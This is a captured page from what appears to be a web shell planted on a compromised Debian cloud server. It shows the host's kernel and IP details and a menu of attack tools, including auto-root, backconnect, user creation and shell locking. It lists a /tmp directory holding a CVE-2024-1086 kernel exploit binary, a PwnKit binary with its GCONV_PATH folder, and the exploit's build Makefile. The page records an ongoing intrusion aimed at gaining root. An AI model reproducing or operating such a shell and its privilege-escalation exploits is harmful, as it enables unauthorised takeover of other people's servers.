Linux ip-172-26-5-244 6.1.0-28-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64
Apache
: 172.26.5.244 | : 216.73.216.21
Cant Read [ /etc/named.conf ]
8.3.14
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
tmp /
CVE-2024-1086 /
[ HOME SHELL ]
Name
Size
Permission
Action
.git
[ DIR ]
drwxr-xr-x
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
src
[ DIR ]
drwxr-xr-x
.gitignore
13
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
LICENSE
1.04
KB
-rw-r--r--
Makefile
1.05
KB
-rw-r--r--
README.md
3.8
KB
-rw-r--r--
exploit
810.73
KB
-rwxr-xr-x
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile
SRC_FILES := src/main.c src/env.c src/net.c src/nftnl.c src/file.c OUT_NAME = ./exploit # use musl-gcc since statically linking glibc with gcc generated invalid opcodes for qemu # and dynamically linking raised glibc ABI versioning errors CC = musl-gcc # use custom headers with fixed versions in a musl-gcc compatible manner # - ./include/libmnl: libmnl v1.0.5 # - ./include/libnftnl: libnftnl v1.2.6 # - ./include/linux-lts-6.1.72: linux v6.1.72 CFLAGS = -I./include -I./include/linux-lts-6.1.72 -Wall -Wno-deprecated-declarations # use custom object archives compiled with musl-gcc for compatibility. normal ones # are used with gcc and have _chk funcs which musl doesn't support # the versions are the same as the headers above LIBMNL_PATH = ./lib/libmnl.a LIBNFTNL_PATH = ./lib/libnftnl.a exploit: _compile_static _strip_bin run: _run_outfile clean: _clean_outfile _compile_static: $(CC) $(CFLAGS) $(SRC_FILES) -o $(OUT_NAME) -static $(LIBNFTNL_PATH) $(LIBMNL_PATH) _strip_bin: strip $(OUT_NAME) _run_outfile: $(OUT_NAME) _clean_outfile: rm $(OUT_NAME)
Close